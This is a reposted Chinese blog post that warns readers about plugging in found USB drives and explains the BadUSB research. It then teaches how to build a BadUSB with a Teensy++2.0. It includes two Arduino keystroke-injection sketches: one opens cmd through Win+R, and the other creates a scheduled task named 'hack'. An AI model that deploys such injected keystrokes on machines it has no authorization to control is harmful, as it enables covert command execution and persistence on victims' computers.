【路边捡到U盘？你会不会好奇的打开它——BadUSB】

如果你在路边捡到一个U盘，你会不会因为好奇而把它插到电脑上打开它？

U盘

如果这个U盘是有心人故意扔在那里的，那么你将为你的好奇心买单＞﹏＜。

2014年的黑帽大会上，BadUSB首次亮相。柏林SRLabs的安全研究人员Jakob Lell和独立安全研究人员Karsten Nohl展示了他们称为“BadUSB”(按照BadBIOS命名)的攻击方法，这种攻击方法让USB安全和几乎所有和USB相关的设备(包括具有USB端口的电脑)都陷入相当不值得信任的状态。

BadUSB主要依靠USB拇指驱动器的构建方式，USB通常有一个大的可重写的内存芯片用于实际的数据存储，以及一个独立的控制器芯片。这个控制芯片实际上是一个低功耗计算机，并且与你的笔记本电脑或台式机一样，它通过从内存芯片加载基本的引导程序来启动。类似于笔记本电脑的硬盘驱动器包含一个隐藏的主引导记录(Master Boot Record)，内存芯片中内存单元的第一段包含让USB记录的编程。允许攻击者在不被检测到的情况下悄悄在USB设备中植入恶意软件。

所以路上的捡到的U盘请记住不要随便打开~

对制作BadUSB感兴趣的童鞋可以继续往下阅读：

普通的U盘一般是不能制成BadUSB的，在这里我推荐Teensy++2.0，某宝上有卖。

Teensy++2.0

这里教大家使用Teensy++2.0制作BadUSB:

第一步 安装Arduino。我这里安装1.8.0

下载地址：评论区

第二步 下载安装Teensyduino，我这里安装1.34。

下载地址：评论区

安装页面

注意红色框起来的是支持的Arduino版本。

第三步 可以插入Teensy++2.0开始搞事了

注意：汉化 file->preferences 选择language为简体中文 2.工具里面要选

送份demo代码：

代码：

void setup(){ //初始化

Keyboard.begin();//开始键盘通信

delay(1000);//延时1000毫秒，不要太短，因为每天电脑的运行速度都不一样

Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题

Keyboard.release(KEY_CAPS_LOCK); //释放大写键

delay(500);

Keyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键

delay(500);

Keyboard.press(‘r’);//按下r键

delay(500);

Keyboard.release(KEY_LEFT_GUI);//松掉win键

Keyboard.release(‘r’);//松掉r键

//delay(500);

Keyboard.println(“cmd”);//输入cmd进入DOS

delay(500);

Keyboard.press(KEY_RETURN); //按下回车键

Keyboard.release(KEY_RETURN); //释放回车键

delay(500);

Keyboard.println(“Hello Teensy++2.0”);

Keyboard.press(KEY_RETURN); //按下回车键

Keyboard.release(KEY_RETURN); //释放回车键

delay(500);

Keyboard.press(KEY_CAPS_LOCK); //按下大写键

Keyboard.release(KEY_CAPS_LOCK); //释放大写键 我们再次关闭开启的大写键

delay(500);

Keyboard.println(“exit”);

Keyboard.press(KEY_RETURN); //按下回车键

Keyboard.release(KEY_RETURN); //释放回车键

Keyboard.end();//结束键盘通讯

}

void loop()//循环，这里的代码

{

//循环体 写入你要循环的代码

}

再附一段代码，在21点打开个txt

void setup(){ //初始化

Keyboard.begin();//开始键盘通信

delay(1000);//延时1000毫秒，不要太短，因为每天电脑的运行速度都不一样

Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题

Keyboard.release(KEY_CAPS_LOCK); //释放大写键

delay(500);

Keyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键

delay(500);

Keyboard.press(‘r’);//按下r键

delay(500);

Keyboard.release(KEY_LEFT_GUI);//松掉win键

Keyboard.release(‘r’);//松掉r键

//delay(500);

Keyboard.println(“cmd”);//输入cmd进入DOS

delay(500);

Keyboard.press(KEY_RETURN); //按下回车键

Keyboard.release(KEY_RETURN); //释放回车键

delay(500);

Keyboard.println(“D:”);

Keyboard.println(“echo I’m back!>a.txt”);

Keyboard.println(“schtasks /create /tn “hack” /tr “d:a.txt” /sc once /st 21:12″);

Keyboard.press(KEY_RETURN); //按下回车键

Keyboard.release(KEY_RETURN); //释放回车键

delay(500);

Keyboard.press(KEY_CAPS_LOCK); //按下大写键

Keyboard.release(KEY_CAPS_LOCK); //释放大写键 我们再次关闭开启的大写键

delay(500);

Keyboard.println(“exit”);

Keyboard.press(KEY_RETURN); //按下回车键

Keyboard.release(KEY_RETURN); //释放回车键

Keyboard.end();//结束键盘通讯

}

void loop()//循环，这里的代码

{

//循环体 写入你要循环的代码

}

http://m.toutiaocdn.com/group/6533953566975984132/?iid=29047133063&app=news_article&timestamp=1521954114&tt_from=android_share&utm_medium=toutiao_android&utm_campaign=client_share

转载请注明：徐自远的乱七八糟小站 » 【路边捡到U盘？你会不会好奇的打开它——BadUSB】